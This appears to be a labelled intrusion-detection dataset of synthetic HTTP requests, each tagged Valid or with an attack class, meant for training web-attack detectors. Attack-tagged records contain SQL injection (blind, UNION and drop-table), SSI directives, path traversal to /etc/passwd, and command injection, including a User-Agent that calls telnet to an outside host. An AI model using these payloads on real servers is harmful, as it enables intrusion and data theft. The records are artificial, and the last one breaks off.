GET /tFDOD64V@I/Aj74Endt/qp4PcJszu-f/ijIn1eiredbdeuhhcsau/hkCJ9cO8mK3ZsVuEDAm/AvcMhw9.mspx?yauexetn=1735886&1o7eradoenhhe=a3hulnardimn&eo=4755&includeT56=hwvnoarii1ih&ajtlsstoyeGOstn=cpfi&oUohtnlDeiveusg=tseemrvsMsa7hy&eaSherilc=qete&childdocumentzH=9&j8hKneeahposo5=a6gozrenrEtteqgzwu&saqS=AND+++++ascii%28lower%28substring%28%28SELECT++++TOP++1++ramIeao8+FROM+sysobject+++++WHERE++xtype++++%3D+++%27U%27++%29%2C1%2C1%29%29%29++%3E+111 HTTP/1.0
Host: 8.230.24.219
Connection: keep-alive
Accept: video/mpeg, audio/basic;q=0.1, application/zip;q=0.6
Accept-Charset: x-mac-icelandic;q=0.6, x-mac-arabic;q=0.3, cp-932, windows-1255;q=0.1
Accept-Encoding: compress, gzip
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 186.220.126.30
Cookie: KTddmd=(|CeinserthgdRandwn;ao=lmochatmp>2;cJLUz=nkS/nodeswftpRbn;rcOe1rt= a3A jebody;bg=06932
Cookie2: $Version="78"
Date: Tue, 21 Apr 09 18:55:40 GMT
ETag: W/"6g2CgBxyxaxVfRuImC"
Expect: 100-continue
From: ik3a@umddedDee.biz
If-Modified-Since: Sat, 05 Apr 08 24:45:00 CET
If-Unmodified-Since: Wed, 04 Jan 06 03:04:42 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 12 Jun 05 23:28:37 CET
Max-Forwards: 53
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Saen 6ahrcn=dstav
Authorization: edese aorgt=egda
Range: 72326-9838
Referer: http://aoqt2en.it/bndwr.jpeg
TE: trailers
Trailer: Cache-Control
User-Agent: 9PBJs_JXJ http://www.emrh8.uk
UA-CPU: PowerPC
UA-Disp: 4133,8176,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 4720x346
Via: FTP/6.3 136.250.185.180:6, Anet/7.0 179.10.197.170
Transfer-Encoding: gzip
Upgrade: einTmf/2.4
Warning: 746 125.14.120.8 "Ooss" 
X-Forwarded-For: 32.163.55.249
X-Serial-Number: 81024686129
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42627
Start - Id: 21212
class: Valid
GET /aoX@/wNF8T7PrgrSkFH6g.lR/eY9/aackiijaslgd/1Hpt/iqSWEow/oA/tge@naMRV05h.html?9nHeeue3Aa78se=tsmh-rpasswd&sY0ioecemot=62276&qt=ihk&3ces9s=77&QZg6sJb=yGr HTTP/1.0
Host: www.hptvE2nea6.uk
Connection: keep-alive
Accept: text/*
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: min-fresh=02664
Client-ip: 161.153.118.75
Cookie: ipeacou=hdsu0;eBgrxt4Wfht=cmame9utc6ri
Cookie2: $Version="099"
Date: Sun, 25 Dec 05 23:19:13 CET
ETag: W/"w1rguXxoUb-3_9bgjfC"
Expect: 100-continue
From: ctgd4q@esrdhYOn.net
If-Modified-Since: Mon, 10 Oct 05 20:20:23 UTC
If-Unmodified-Since: Tue, 18 Nov 08 01:18:57 CET
If-Match: *
If-None-Match: "DtwXgHOQQkkN5YNzxV3"
If-Range: Sat, 27 Aug 05 20:14:31 GMT
Max-Forwards: 4980
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: 9efEi6 8oao=neZgS
Authorization: usnzi o8nql=er3rndn4
Range: 14-4533,9-6,-7926
Referer: http://www.ho8eao.de/e0utkp7o/rtjvbdlu/olah/hnphtp.asp
TE: trailers
Trailer: Upgrade
User-Agent: 9wG_7Nnz http://www.y5dwuv.it
UA-CPU: MIPS
UA-Disp: 158,905,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 402x543
Via: HTTP/8.4 2.140.71.122:4712, 8.5 192.33.172.98
Transfer-Encoding: identity
Upgrade: paa/5.3, a9Au/8.0
Warning: 474 205.133.110.111 "znelncj" "Mon, 25 Jan 10 21:18:40 UTC"
X-Forwarded-For: 235.168.20.114
X-Serial-Number: 000063764579
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21212
Start - Id: 42240
class: SqlInjection
GET /Hlytylrsrln/6K46jfCaWhoLEz/OLxJHm/ePwY8b/aUv/eSlg7Y4ihNiJX/tfobhaxt/4udHUxF/yEj/CEH4eL/nlchild/qobfeie.tiff?ZC2Lxm.=%27%29+++++UNION++ALL++SELECT+++++%27Eh%27%2C5%2C32%2C%27natoi%27%2C1364+++FROM+++++irmtbatet+++++WHERE++%28++%27%27+%3D%27 HTTP/1.0
Host: 103.12.33.66
Connection: close
Accept: application/*;q=0.2, audio/x-wav;q=0.0, image/*
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: nrEhb-nc
Cache-Control: min-fresh=532
Client-ip: 104.162.121.20
Cookie: fra1oeos= 0etud l3ut ;DfHe1dCMjR=9;he2egNaefe=IrJe xvet-iems9
Cookie2: $Version="26"
Date: Tue, 17 Jan 06 14:00:16 CET
ETag: W/"I_dMSOn75Rh5PGE"
Expect: 100-continue
From: AhkTtd8@hidg5ir.de
If-Modified-Since: Wed, 30 May 07 16:18:04 UTC
If-Unmodified-Since: Fri, 02 Dec 05 05:15:25 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 03 Apr 06 13:10:30 CET
Max-Forwards: 61
MIME-Version: 1.3
Pragma: eRot='7e9rdKid'
Proxy-Authorization: NTLM M2FlbzFvd2R2amFoamFybnhjcWx1dXRkMXZhOXhMaXRtbmtzc2RPYXBl
Authorization: jlaeo nf6ee7he=tqriai
Range: 4539-14148,-19,934-
Referer: /qn8h/qssjohr/ttlE/rptia.dll
TE: trailers,trailers,trailers
Trailer: Expect
User-Agent: 3rSXRNx.O http://www.dIsar.com
UA-CPU: StrongARM
UA-Disp: 8058,0040,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 108x2342
Via: 9.3 www.zieguner.shtml
Transfer-Encoding: gzip
Upgrade: sssi/2.7, rim/3.4, mCeth/1.0, n82sil/5.7
Warning: 028 56.37.102.108 "t6tlhhan1eX2IilnhgP" 
X-Forwarded-For: 42.114.104.151
X-Serial-Number: 29366252
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42240
Start - Id: 5480
class: Valid
PUT /tHX/2cdsema/Osamovye01ftpperl_P.tiff? HTTP/1.1
Content-Length: 287
Content-Language: ep
Content-Encoding: identity
Content-Location: /cfd8/6ibrnse.bin
Content-MD5: ZXR1c3NjbmE0c2VpMGFJYg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 17 Oct 09 14:28:44 CET
Last-Modified: Sat, 28 Oct 06 04:55:54 GMT
Host: 237.58.212.212:80
Connection: keep-alive
Accept: application/*, application/zip;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: lW-Te;q=0.0
Cache-Control: min-fresh=1355
Client-ip: 13.15.222.251
Cookie: suaei=dexd3o0c0ro;sadRcrtOpyhMir=NbiNltr;zstw1riwnu=poo;meeshchaobyn=anprocessing-instructionos;i8dii4lt=r7aqeDXzSwwd;dTiclAr5ZrutoOs=8193555324
Cookie2: $Version="0"
Date: Wed, 29 Apr 09 13:37:18 UTC
ETag: W/"PFIRaV0RmbuwoOK19"
Expect: 100-continue
From: lczro@ehIntmhe.com
If-Modified-Since: Thu, 24 May 07 07:15:59 UTC
If-Unmodified-Since: Fri, 19 May 06 15:00:52 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 17 Mar 05 13:30:24 GMT
Max-Forwards: 6
MIME-Version: 6.9
Pragma: lctsd=sootf
Proxy-Authorization: Digest nonce
Authorization: Digest opaque="hpbrao"
Range: -1,49-10
Referer: /aokNezz/rosheKto/ensoou.asmx
TE: trailers
Trailer: Max-Forwards
User-Agent: AEgu5aato (mfKwsSd; swvMfeiM; riz_vt20; j._z@yj4; eEGe4m4o4Q)
UA-CPU: StrongARM
UA-Disp: 4823,2898,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 2642x571
Via: 3.1 www.fesej.jpeg, 8.2 www.ahaeio.gif:0218, HTTP/8.7 58.135.5.127
Transfer-Encoding: compress
Upgrade: aowete/2.3, cLo43/0.3
Warning: 081 www.m8rn1rmo.shtml:31303 "6h7tteywuheldre" 
X-Forwarded-For: 16.29.207.187
X-Serial-Number: 56905023798190
----: ---------------------
~~~~~: ~~~~~~~~~~~

tas0e4iod=di2Uz9dttsvmsnio&Dla6etKso=598662&ueptixRnS='E:t@&eeng=cN\nl&ongto=5rpo&amucn=dqdalir&oxt7pqteas=drc&le=bvtflctu5no1stno&yyacceptshzK=shutdowna&q]rSeit6e;+c&GBWjWN=wJr&fSOCgSpdmmunion=ry7o&tljYl5thTo=uvjn6eabvrse&eT1cTa=processing-instructionn4sfaidse9ae9dnRglt

End - Id: 5480
Start - Id: 40852
class: SSI
GET /l68i3qMj/Ipi.htm?Shrbwufsta=Net&irecihsLee7hfs=53254&ddpon=cform&sn6gord=+b4&NteyWm5cmiEnmi=esy&6t=9&farLnpcYap3a=Eaoeval&fSnh=%7C&atTefeo=002&qt=voe&icaHeeflahuihc=%3C%21--++%23odbc+connect%3D%22tir%2CooayTp%2Casar%22++++statement%3D%22select++++*+from+++++ent%22--%3E&lnwgaai=08477798&tatrl=dshutdownidusrbodyd&ETtmfhnnriTu4lt=uS%40s5VY HTTP/1.0
Host: 215.182.78.219
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.4
Accept-Language: asii-aaeyOv;q=0.6, mtpRa-i4zgYept, MeeE-rt
Cache-Control: max-age=82200
Client-ip: 183.188.60.40
Cookie: tec=nn;zgytAst=re1toi;easr=oii Ey;cihadt7=Pax3ora80r;KcopyQtrcpcO=kq2DwV.
Cookie2: $Version="05"
Date: Fri, 29 Aug 08 14:39:26 UTC
ETag: W/"RTGG@0tIYgXyT1zHl0"
Expect: hw5e
From: ttntvsh@tetyoEibr.uk
If-Modified-Since: Wed, 10 Sep 08 15:57:11 GMT
If-Unmodified-Since: Mon, 24 Sep 07 15:32:54 UTC
If-Match: "WD4Y3yYdXzMK1.8jb"
If-None-Match: "cnPmCTzidCptVT6dbY"
If-Range: Wed, 12 May 04 18:12:06 CET
Max-Forwards: 7318
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Digest cnonce="li7or"
Authorization: Digest uri=http://oo7ich.fr/nILa.rar
Range: 89-7,-933
Referer: /l2vUr/hste/recjnq/sramr.jpg
TE: trailers,trailers,trailers
Trailer: Date
User-Agent: ahnk (e_kALFoy4; asROkWL; rggY2B4HkF; d9n6P_L2sg; m@OldC)
UA-CPU: Sparc
UA-Disp: 2426,7787,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 5993x410
Via: Atxfa/0.2 www.wepf.tiff:6674, 6.2 14.204.244.157:08388, HTTP/0.8 www.ernsrn.js
Transfer-Encoding: compress
Upgrade: iTdaap/8.9
Warning: 587 136.89.138.222 "srssp" "Sun, 31 Dec 06 15:59:03 UTC"
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 49586702317462
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 40852
Start - Id: 46188
class: PathTransversal
GET /e4kqpuJ@nI9ic.js?tlhy=993192885&goacifh=hhten+ehcat%26it%28tE&ajtr=sg&ohepfaopIuf7i=eitI14Uch&ceHbssdsmrsiq=88346619&3rn8i0tHg1r6=ajgWGAoAdvl&99ek563aLhmaps=723246335&h3A@QdGki-C0=aso%3D%3DQat%26oshstaS+&dKero0m=%5Ctcwpasswd8earwhere&rt8n8=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&6osnhnsapna1wi1=cA&isrtoe=taheoNa0hs&9V3SIGAk=03&iolelTIr=snz HTTP/1.1
Host: 222.47.15.49
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate, compress;q=0.4, gzip
Accept-Language: *;q=0.8
Cache-Control: max-stale
Client-ip: 68.94.47.234
Cookie: lrfhsueeonsecbi=35;pea3esOf=31068;wb@YFossd=1slstdinmnddda;t2aehdl=10729279;4deuFEB=e;ar3
Cookie2: $Version="82"
Date: Tue, 10 Mar 09 01:40:20 CET
ETag: W/"MLizzqbNdRPN0jiUSt"
Expect: 100-continue
From: sloo@sd406oko.ch
If-Modified-Since: Tue, 02 Mar 04 17:16:24 GMT
If-Unmodified-Since: Fri, 03 Apr 09 16:48:18 CET
If-Match: "NEpaVxwPI-12jrfUL6"
If-None-Match: *
If-Range: "-Rj9Lq3GxzlX@C-3r-"
Max-Forwards: 7323
MIME-Version: 2.5
Pragma: p=famajhe
Proxy-Authorization: Basic Z2Q2bmVlOmFsaWd0aA==
Authorization: NTLM dTBVYnQzcnRvNkp4YXFoY29lYWllc2RhaWF4cFB4aGVzbWRkcm5zMmhzaWZsaGhk
Range: -746439,91478-,-9017
Referer: /si95/he4Ips/saoeqhr7.cgi
TE: gzip
Trailer: Host
User-Agent: fae9tooetqvtbe0tT
UA-CPU: x86
UA-Disp: 411,052,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 939x7286
Via: 6.5 185.106.63.180
Transfer-Encoding: gzip
Upgrade: amiap/9.1
Warning: 885 150.132.83.196:7 "UN6M8draouta3nienwag" 
X-Forwarded-For: 249.22.33.20
X-Serial-Number: 308717764624238
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46188
Start - Id: 28754
class: Valid
GET /hSFY6JqnHVTmK4QMw/2ealtaltwss/sif9vlhtrt5so8yssta/nh0Io.@sYNd_KzV/NuitemunskwoAva/ktCsdmveNaAx/0Z1/libo-/hgKlAo./rQK2V@m9FckoFYB/gusrwy.gif?1eraf=Mg%3Bou HTTP/1.0
Host: 155.158.46.3
Connection: keep-alive
Accept: video/mpeg;q=0.5, application/zip;q=0.7, text/plain
Accept-Charset: *
Accept-Encoding: 
Accept-Language: a-tgaMf4
Cache-Control: min-fresh=8
Client-ip: 189.108.26.95
Cookie: pluizd=4012629;uzt=@)
Cookie2: $Version="18"
Date: Fri, 25 Aug 06 02:54:42 CET
ETag: W/"bXSYAYZf1wPqvMu4l"
Expect: oraddz8m=putlz
From: s9len@yaTi.net
If-Modified-Since: Mon, 20 Dec 04 09:43:31 UTC
If-Unmodified-Since: Thu, 23 Mar 06 18:57:54 GMT
If-Match: *
If-None-Match: "b@EwLuTkOYon5_2"
If-Range: Tue, 27 Jul 04 01:33:24 GMT
Max-Forwards: 990
MIME-Version: 8.9
Pragma: m2et7si='rJieh0'
Proxy-Authorization: Digest nonce
Authorization: mng4r oCan=tdmaTmo
Range: 304956-,017-,153089-880
Referer: http://tEdor.net/ifoo/dgsoghLe/n8zuyR.tar
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/7.7 (Machintosh; U; PPC Mac OS X 3.2; ct-be; rv:9.2.8) Gecko/48574221
UA-CPU: Sparc
UA-Disp: 062,8206,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 621x541
Via: 2.0 61.208.22.152, 4.9 232.2.121.238, 4.7 196.60.161.37
Transfer-Encoding: deflate
Upgrade: lwsi/8.0, kwn0/1.2
Warning: 144 171.190.65.195 "rrrxiieeh5" "Mon, 23 Jul 07 03:07:48 CET"
X-Forwarded-For: 52.173.254.213
X-Serial-Number: 77870
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28754
Start - Id: 4010
class: Valid
POST /T6wFenbwI6to/ier1uMqymR/isuLdpD6ikgusebrihu/xnetoSOocf6enltsoi/fz.sh? HTTP/1.1
Content-Length: 199
Content-Language: fki,aehocr
Content-Encoding: identity
Content-Location: /ttxit/drgnra/n8l0/ltEuh.php3
Content-MD5: UkltN2psM3lzZW9rdDZpTg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 09 Feb 05 15:34:52 GMT
Last-Modified: Fri, 21 Nov 08 11:59:23 UTC
Host: www.tottihe.biz:80
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: windows-1254;q=0.2, windows-1254;q=0.7, utf-7, cp-936;q=0.6, x-mac-korean;q=0.3
Accept-Encoding: compress, deflate, compress, deflate;q=0.4, identity;q=0.7
Accept-Language: *
Cache-Control: min-fresh=2406
Client-ip: 3.115.28.101
Cookie: sam.GGl=82352303
Cookie2: $Version="7"
Date: Sat, 22 Jul 06 13:23:42 UTC
ETag: "7EhkgynX9@ojjGSG"
Expect: 100-continue
From: erOso4A0@Obex.be
If-Modified-Since: Fri, 30 Apr 10 22:19:28 UTC
If-Unmodified-Since: Wed, 01 Feb 06 02:47:09 CET
If-Match: *
If-None-Match: "NCK8_MqUQkgAFzK"
If-Range: *
Max-Forwards: 41
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: tvSo3 l1oo=dbetatzy
Authorization: Digest username="rxgjrbs"
Range: -75,624299-,-14
Referer: /ne0Ae.avi
TE: deflate
Trailer: Transfer-Encoding
User-Agent: yaGutlmssE
UA-CPU: MIPS
UA-Disp: 055,684,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 242x137
Via: 3.4 www.coos0.htm, HTTP/4.9 www.ecexmh.js, 4.8 241.54.59.21
Transfer-Encoding: gzip
Upgrade: eed/4.1, esner/6.8
Warning: 174 www.i0db.shtml:58013 "atpwrrnueltoh" "Sun, 15 Feb 09 08:53:40 GMT"
X-Forwarded-For: 189.95.227.203
X-Serial-Number: 4557721
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

Cg98Xrb1LjbQ=58&3adaste=fjmq&1hXPWAp_=ny&qrtde4lo=239250&deleten48VoptHs1=3&ihgnl=Oooa1ckrsyiye6&8qnl=@0Ogermd r&ihsaCaldhit= tauh&oaoeeoedae=retn&aidm9gree6Pa=Eadvasemhttpswyeo7&uszO=578477&ii=nue

End - Id: 4010
Start - Id: 11201
class: Valid
GET /zDJxuZ-FqXUphJshutdown/lUMRca8fV-J4/rLA/wqwkvsJb/hLE20jlBGJ9X/dnoaelyyoabaium/3YDZPvOIhZd.pl?gtoymrskfUs=t1UzlbH1&nlnndte=4558513545&tonl=722892587&Tthor5rati4joO=oeoqlontswg0bi&wiglhrhrH=c%7Eem&eeo7e=LostahUqfactzAS6&1kl@=f+t+m HTTP/1.0
Host: 145.248.103.223:80
Connection: close
Accept: image/*;q=0.3, application/postscript
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: 5e=RFuc9un
Client-ip: 210.30.250.18
Cookie: erHpejrec=;wfgdeoens;eD5Smrae=06
Cookie2: $Version="256"
Date: Tue, 26 Aug 08 07:25:20 CET
ETag: "Sia4FFlHTJs4jsr"
Expect: e8howtr
From: oner40@a3mRaitss.com
If-Modified-Since: Sat, 03 Apr 04 21:22:46 GMT
If-Unmodified-Since: Wed, 12 Mar 08 24:18:09 CET
If-Match: "ojrgqhPNgQVN4tVa0"
If-None-Match: *
If-Range: *
Max-Forwards: 8478
MIME-Version: 3.9
Pragma: dtreed='py57upi'
Proxy-Authorization: Digest cnonce="irua"
Authorization: uantca 6t6sleri=Mue1e5z
Range: 9-8943
Referer: /ioe0sJ/eied.jpeg
TE: deflate;q=0.3
Trailer: Range
User-Agent: Mozilla/7.0 (Machintosh; U; PPC Mac OS X 6.9; ro-6g; rv:8.8.1) Gecko/83286359
UA-CPU: StrongARM
UA-Disp: 473,1490,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 1597x0250
Via: 8.4 www.iae3iirc.html, ok7pti/1.6 www.senz0iie.html
Transfer-Encoding: qveeaz
Upgrade: soi/9.2, sgsr8/4.6
Warning: 482 www.nt5e.js "raopnnI2epacwex" "Sun, 04 Jan 04 12:41:28 CET"
X-Forwarded-For: 137.203.184.31
X-Serial-Number: 450563801661696804
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11201
Start - Id: 41219
class: SqlInjection
GET /fte4ht/tgneihW8s.html?gdt0soruiA8i=atesny9oahme4cdpcl&eeTqsDmtstlg0n=3%7C+n%3Dfso3cmdUschildh-ReThN&ghtihne=otie&3d_K.iHnHpunionn=wSvro HTTP/1.1
Host: www.stnne3e.net:80
Connection: close
Accept: image/*
Accept-Charset: utf-8;q=0.6, iso-2022-jp;q=0.4, koi8-r, euc-kr;q=0.2, euc-kr
Accept-Encoding: compress;q=0.8, compress;q=0.0, gzip;q=0.3, deflate;q=0.5, gzip;q=0.1
Accept-Language: ';drop    table nQbqtcMte
Cache-Control: no-cache
Client-ip: 14.158.100.251
Cookie2: $Version="35"
Date: Mon, 29 Nov 04 12:34:14 CET
ETag: "BjDMsX3-UNmjL7Yqx50"
If-Match: *
If-None-Match: "PendhKkXaNo-W0n3y"
If-Range: Fri, 18 Nov 05 05:49:55 GMT
Max-Forwards: 321
Pragma: et=R
Referer: http://Mrcteer.biz/emntal7.pdf
TE: trailers
User-Agent: n7olnPAr (4GHR7u2tg4)
Via: HTTP/9.6 www.pzhC.jpeg, 5.7 www.yoshtm.tiff
Upgrade: wtini/9.7, nnus/7.6, tdcrs/3.3, awtrj/9.5, 6xe/6.3
----: -----------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 41219
Start - Id: 43787
class: OsCommanding
GET /scripts/file.bat" "& dir c:/ .exe? HTTP/1.0
Host: www.eajr.st
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 239.143.8.35
Cookie: bgin7im=asl"apacsdrop"atO/ 
Cookie2: $Version="222"
Date: Wed, 16 Feb 05 10:16:57 GMT
ETag: W/"AMC5ZOlrnU7y1Mew"
Expect: 100-continue
From: qto7read@r8owxth.de
If-Modified-Since: Sun, 30 Mar 08 11:56:33 UTC
If-Unmodified-Since: Mon, 02 Feb 04 23:52:49 UTC
If-Match: ".SZXlk0tUSsOQGtXMRc"
If-None-Match: *
If-Range: *
Max-Forwards: 6908
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: NTLM ZmxlYXN1dXJhYU12b25ob25mQm5JYWVzbHR0bmlhYXNoNnVyZw==
Authorization: pTeest obeyj=ge1a
Range: 904036-,02113-35,44499-
Referer: http://fotBb2oh.biz/cemanrA/tbevib/snhe/frwvcc/hsn0asyo.cfm
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/2.7 (compatible; Konqueror/3.6; Open BSD i386; 51wrcacrq)
UA-CPU: Sparc
UA-Disp: 911,7505,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 154x454
Via: HTTP/2.5 181.197.68.245, FTP/3.5 www.edewa.css
Transfer-Encoding: identity
Upgrade: tEYegn/9.0, l5aur/2.0, tbef/0.2, 8mru/4.2, Nsq/6.6
Warning: 848 www.ellxsil2.jpg "n5rnlcviw" "Wed, 23 Mar 05 14:33:15 GMT"
X-Forwarded-For: 203.135.237.55
X-Serial-Number: 11781143207905764900
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 43787
Start - Id: 39684
class: SSI
GET /2vYBkKxRzTDa./eemtjpjtrftre/abuveeeoLr/okp3/iv0i6tS1CgXkd2rxkuN/nnninatumEdnine/sadLaX4Xlk.gif?1sd=e9ectcWEtofc&elsD6dldi=pR7hdyrmfc&nnteX=dsH&tsxiayTIk=+eooi70hu0i%24o&ze3hvuerahvr=y4p&Bhiavgo8w=%3C%21--+++%23include++++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22+++++--%3E&iMkbetween=ogEard&sp=t+&niAxiwlr=v%28yo&x4frP8VN=91492083&enw3nm=eigb2eioneeetert&sn8snicei3e=%7Cmdelete%3B HTTP/1.1
Host: 232.0.227.83
Connection: close
Accept: */*
Accept-Charset: utf-8;q=0.6, x-mac-chinesesimp;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 210.184.120.254
Cookie: DS_K4yWxmlt=824;h8fe=t]i
Cookie2: $Version="5"
Date: Sat, 17 Jul 04 18:32:11 CET
ETag: "MnC6RG5yCfdECDak"
Expect: 100-continue
From: Keupawbo@sj1pedml1a.be
If-Modified-Since: Thu, 07 Aug 08 19:56:17 UTC
If-Unmodified-Since: Wed, 14 Jul 04 02:34:49 CET
If-Match: *
If-None-Match: "tfE-Bj7GvTdbVvRkYZrr"
If-Range: *
Max-Forwards: 743
MIME-Version: 9.9
Pragma: 2egaoA=etIi
Proxy-Authorization: Digest nonce
Authorization: prysso qm3ey=eoeaDme
Range: 1-2703
Referer: http://www.riti4na.fr/eeei/snpngtt1/temht/caeury4.jpeg
TE: gzip;q=0.8
Trailer: User-Agent
User-Agent: tImsaahsti (tVvDPGE; i1JXMNbA; r7bi0B; eNYMl_; a6DctQ)
UA-CPU: Sparc
UA-Disp: 0266,938,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 726x074
Via: FTP/0.5 www.ttarfotw.png
Transfer-Encoding: deflate
Upgrade: im0/0.0, gln/3.7
Warning: 245 www.etcYe.gif "ra5teOtlcka8shsedl7" 
X-Forwarded-For: 166.133.168.205
X-Serial-Number: 9911764547155
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39684
Start - Id: 44791
class: PathTransversal
GET /FdyQtG/nWi9hnX.php4?e1R1seo2eaf=21&VblKQ8kscript_select=520&hmoiue=2VVzJ1rvMm&EG2oocibte8t=6709b&QO6pVs=file%3A%2F%2F%2Fm%3A%2Foel%2F3k%2ForiefIie.xml HTTP/1.0
Host: 133.169.241.89
Connection: maenas
Accept: text/xml;q=0.3
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 175.217.159.32
Cookie: neet=9157226;pWuvrbnuh=df|
Cookie2: $Version="77"
Date: Mon, 18 Dec 06 10:27:31 GMT
ETag: "iFE2lKQFDoEmCoaqzw"
Expect: 100-continue
From: Cmaxdcp@rimabEod.be
If-Modified-Since: Mon, 27 Mar 06 13:37:41 GMT
If-Unmodified-Since: Sat, 20 Feb 10 11:26:53 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 01 Jun 07 16:07:58 CET
Max-Forwards: 3
MIME-Version: 7.4
Pragma: ntwesysr=srle
Proxy-Authorization: Digest qop=auth-int
Authorization: NTLM RkU2b1REdHRpaWl4cmVlb3Ruc2Z1dGRmY2hmaWVnZG55ZW9iYm9vYTJ3ZGNuZw==
Range: 99-
Referer: /tghxp/LeiOf4i/i36ta3f/oeer/peounasl.js
TE: deflate;q=0.1,trailers,deflate;q=0.7
Trailer: Expect
User-Agent: Mozilla/4.0 (X11; U; SunOS sun4u 3.6; gm-ie; rv:8.2.4) Gecko/36722640
UA-CPU: MIPS
UA-Disp: 3445,5667,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 822x152
Via: 7.4 www.bcgs.tiff, 2.6 www.YodeE4.shtml, 9.6 25.113.223.183:1
Transfer-Encoding: gzip
Upgrade: ntSos/7.8, twuyc/7.4, v1khi/3.8, ftess/6.0
Warning: 136 www.f72ts.jpeg "daakn3ltgiptelaits" "Sat, 10 Oct 09 20:12:41 UTC"
X-Forwarded-For: 87.170.85.167
X-Serial-Number: 2157159271334
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44791
Start - Id: 36837
class: OsCommanding
PUT /rrfgncuaemitieOOekcO/dij/be3aijrsakat/hw4AgBabi4FBY/a-rXVN6cs.jpeg? HTTP/1.0
Content-Length: 260
Content-Language: p,3fdiCtin,ic
Content-Encoding: gzip
Content-Location: http://www.Lrcaerh.cz/keoei.dll
Content-MD5: ZWFzZ29BZE5PbHV3cjRyZA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 22 Dec 06 01:26:10 UTC
Host: www.SfinEiem.gov
Connection: oWltb
Accept: video/quicktime, audio/*
Accept-Charset: *
Accept-Encoding: identity;q=0.0, deflate, gzip;q=0.0, deflate
Accept-Language: *;q=0.0
Cache-Control: no-cache
Date: Mon, 26 Nov 07 20:33:10 CET
Expect: 100-continue
From: Iaa3tD@dnbEs.st
If-Modified-Since: Wed, 03 Feb 10 11:49:08 UTC
If-Unmodified-Since: Sat, 03 Sep 05 23:02:20 UTC
If-None-Match: *
If-Range: *
Max-Forwards: 0077
MIME-Version: 0.1
Pragma: lfldr4r=d
Proxy-Authorization: Digest realm
Authorization: Digest nonce
Referer: http://3seaen.fr/u8cam/ldfgyaBn/yrrft/bsriaz/y0icnm.asp
Trailer: Pragma
User-Agent: \"   \;  \/usr\/bin\/telnet www.asgengtala.com 85 ;
UA-Disp: 209,990,16
Transfer-Encoding: identity
Upgrade: 1tg/8.4, 7fsss/1.9, aon/0.2, schwr/8.8, ene/6.5
Warning: 040 www.eesenp.jpeg "eeeu" 

